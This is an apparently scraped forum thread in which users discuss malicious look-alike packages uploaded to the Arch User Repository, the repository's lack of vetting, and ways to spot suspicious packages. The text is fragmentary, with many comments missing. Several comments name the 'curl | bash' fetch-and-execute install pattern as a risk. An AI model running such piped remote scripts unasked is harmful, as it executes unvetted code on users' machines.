To be honest, I don't know exactly where this discrepancy comes from. But I wouldn't be surprised if it's related to how Arch is basically a genuine community distro while Fedora has official ties to Red Hat.
Btw, small correction, AFAIK you're not supposed to install packages from the EPEL on Fedora. Perhaps you meant COPR (basically Fedora's AUR) or Terra instead?
Getting started with EPEL
Fedora DocsMwa
in reply to Voytrekk • • •facow [he/him, any]
in reply to Mwa • • •hobbsc
in reply to Xylight • • •lagoon8622
in reply to hobbsc • • •daggermoon
in reply to lagoon8622 • • •lagoon8622
in reply to daggermoon • • •curlthings intosh. Or downloading randomexes on Windows etchobbsc
in reply to lagoon8622 • • •lagoon8622
in reply to hobbsc • • •balsoft
in reply to hobbsc • • •Ulrich
in reply to Xylight • • •So...did someone just like create a new package cloning these or did they somehow get into the "official" repository? Is there no attestation process?
forbiddenlake
in reply to Ulrich • • •Ulrich
in reply to forbiddenlake • • •tehn00bi
in reply to Ulrich • • •Ulrich
in reply to tehn00bi • • •HERRAX
in reply to Ulrich • • •jenesaisquoi
in reply to Ulrich • • •MentalEdge
in reply to Ulrich • • •MentalEdge
in reply to forbiddenlake • • •To be clear, when projects distribute their software via the aur, someone else can't just issue an update using their package name.
This person appended "fix" and "patched" to appear in searches next to legitimate packages, and seem worth installing instead.
Jolteon
in reply to Xylight • • •MentalEdge
in reply to Jolteon • • •Absolutely.
The Arch User Repository is a way for anyone to easily distribite software.
Hence it has never been secure, and rather than claim it is, you mostly see people and documentation warn you about this, and to be careful if using it.
Any schmuck can make whatever they want available via the AUR. That's how even the tiniest niche project can often be installed via the AUR. But you trade in some security for that convenience.
Derpgon
in reply to MentalEdge • • •It shouldn't be used as a marketplace, it should be used as a repository. You can probably find a lot of malware on GitHub, doesn't mean you go there to choose your text editor.
I never search the AUR directly, I only use it if some README tells me I can install their software via an AUR package.
Dima
in reply to Derpgon • • •People need to remember it's not some carefully vetted app store and that they need to be the ones vetting any packages they install and any changes when updating.
HaraldvonBlauzahn
in reply to Xylight • • •What a nice attack on privacy-friendly infrastructure.
And then, Arch AUR has such suspicious things like the Brave browser which claims to reduce tracking.... and works together with advertisers.
To be clear, AUR is fantastic if you develop some experimental package and you want to give it to your friends to try it out easily. But not as a general distribution mechanism.
HaraldvonBlauzahn
in reply to Xylight • • •curl | bashinstall procedure and relying on TLS certificates which are e.g. issued by the Russian government. (No, the rust project won't use a Russian/Chinese/US Gov certificate but your browser will trust near all of them...)Ephera
in reply to HaraldvonBlauzahn • • •JackbyDev
in reply to Ephera • • •HaraldvonBlauzahn
in reply to Ephera • • •wewbull
in reply to HaraldvonBlauzahn • • •Ephera
in reply to HaraldvonBlauzahn • • •Sure, I guess, if you've got a distro installed on your PC and use the distro-provided packages to install the Rust compiler, then you can't be subject to such certificate MitM attacks.
Your comment sounded like you were primarily concerned about the shell script piping rather it just being a program which can be downloaded without going through distro packages.
HaraldvonBlauzahn
in reply to Ephera • • •The AUR install scripts are just downloaded shell scripts which are executed (hopefully after inspection).
curl | bashjust skips the inspection step - curl downloads to stdout, bash executes from stdin.muusemuuse
in reply to Xylight • • •We are getting to the point where inviting more people in means we will need an automated babysitter to watch for this shit and to pull it once it’s discovered. Apple has a walled garden approach that’s certainly taken a big chunk of malware threats out of their devices but their walled garden approach is ridiculous and impractical for Linux. The Microsoft method of monitoring and second guessing everything with antimalware programs is also suspect because it is super easy to abuse and resource intensive. We have clamAV but clam kinda sucks.
Linux is at the point where we need something that audits what’s going in and automatically yanks it back out remotely if it’s found to be a problem. Things can only be added by the user, but the bot can remove them without interaction of the user.
I don’t see this happening though. Instead, I see this as more of a rust vs C thing all over again, where valid critiques are drowned out by “improve your skills bro.”
mazzilius_marsti
in reply to muusemuuse • • •oo1
in reply to Xylight • • •I already assumed aur was riddled with stuff like that.
Use a condom when fucking around in there.
AceFuzzLord
in reply to Xylight • • •Gotta assume that if any Arch users actually fell for that one, that they either let their kids use their device or they're generally not smart ( which absolutely goes against my stereotypical view of an arch user ).
pfr
in reply to AceFuzzLord • • •moseschrute
in reply to pfr • • •I had no idea that existed but I’ve just returned from r/unixporn. There are some sick setups. Also we all copy. My entire neovim config is copied and modified from a couple dozen setups I admired. Nothing wrong with copying things you like. Don’t gate keep Linux.
However… Minecraft cracked is pretty funny lol.
lattrommi
in reply to moseschrute • • •I agree that gatekeeping is no good and people should not do that.
However...
I do not feel that assuming all people copy, should be done either, in my opinion.
pfr
in reply to lattrommi • • •lattrommi
in reply to pfr • • •I don't know if there is a word for what I was trying to point out.
Like an opposite to gatekeeping, sort of.
I do not like when people use 'we', in ways that include people that it does not apply to. Lumping everyone together inaccurately into a group.
teawrecks
in reply to Xylight • • •mazzilius_marsti
in reply to Xylight • • •the firefox, zen browser and libre wolf packages are concerning. The ttf ms font too. Those are very normal apps and unless you pay attention to the package name when doing "pacman -Syu", you would fall for the malware.
If only we can compartmentalize all AUR packages. The download AUR sources iirc are already in something like $HOME/.paru. Installing is a different story, because these packages can put their executable all over the places: /usr/local/bin, $HOME/local/bin.
Cysio
in reply to mazzilius_marsti • • •at this point you'll be reinventing Flatpak
SayCyberOnceMore
in reply to mazzilius_marsti • • •With respect, you wouldn't install these by just doing an update, so
pacman -Syuis fine.You would have needed to install these manually, or a package that depended on them - both from AUR - so you'd also need to use
yay(etc) to install them.But - I totally agree with your points that tge names look innocent enough for someone to install those over other packages.
Always look at the AUR (website) at the package details - if it's new(ish) and has 0 or 1 votes, then be suspicious.
redxef
in reply to Xylight • • •With
vulnerable_packages.txtcontaining one package name per line.Matt
in reply to Xylight • • •